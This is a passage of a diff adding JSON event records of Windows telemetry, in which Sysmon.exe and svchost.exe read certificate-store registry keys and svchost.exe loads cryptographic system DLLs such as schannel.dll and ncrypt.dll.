2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "schannel.dll", + "image_path": "C:\\Windows\\System32\\schannel.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mskeyprotect.dll", + "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", + "registry_value": "AuthRoot", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", + "registry_value": "SmartCardRoot", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 